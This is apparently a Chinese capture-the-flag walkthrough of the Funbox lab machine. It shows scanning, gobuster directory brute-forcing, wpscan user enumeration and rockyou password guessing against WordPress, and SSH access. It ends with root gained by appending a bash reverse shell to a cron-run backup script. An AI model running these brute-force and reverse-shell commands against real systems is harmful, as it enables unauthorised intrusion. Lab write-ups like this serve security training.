本文描述了黑客通过IP端口扫描、hosts修改、目录探测(如gobuster)等手段,逐步获取服务器权限的过程,包括使用wpscan枚举密码,最终实现SSH反弹shell并获取root权限,找到隐藏的flag。
扫描存活主机IP
IP端口扫描
访问80端口
发现进不去 需要修改一下hosts
```
vim /etc/hosts
```
扫描目录
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,zip,bak,txt,php -u http://10.4.7.148
访问 http://funbox.fritz.box/robots.txt
发现一个目录
使用wpscan扫描网站获取账号密码
wpscan --url http://funbox.fritz.box/ -e
使用wpscan枚举密码
wpscan --url http://funbox.fritz.box/ -U admin,joe --passwords /usr/share/wordlists/rockyou.txt
连接ssh
提权
进入funny 文件夹 发现 .backup.sh .reminder.sh
查看两个文件 发现是一个 .backup.sh 是一个定时执行文件
那就写入shell反弹 然后kali监听
echo "bash -i >/dev/tcp/10.4.7.182/8888 0>&1" >> .backup.sh
在经过四次监听之后 终于是拿到了root权限 并找到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
